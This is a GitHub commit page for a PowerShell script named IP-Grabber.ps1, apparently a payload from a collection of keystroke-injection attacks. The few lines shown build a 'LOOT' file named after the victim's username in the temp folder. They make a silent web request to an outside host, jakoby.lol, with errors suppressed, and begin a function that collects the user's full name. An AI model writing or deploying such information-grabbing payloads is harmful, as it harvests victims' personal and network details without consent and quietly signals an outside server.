Update IP-Grabber.ps1

This commit is contained in:
I-Am-Jakoby 2023-06-10 15:28:49 -05:00 committed by GitHub
parent 1060c313fe
commit 2575e78c54
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,5 +1,5 @@
$FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt"
iwr "https://jakoby.lol/hak5" -EA 0 >$null
#------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName {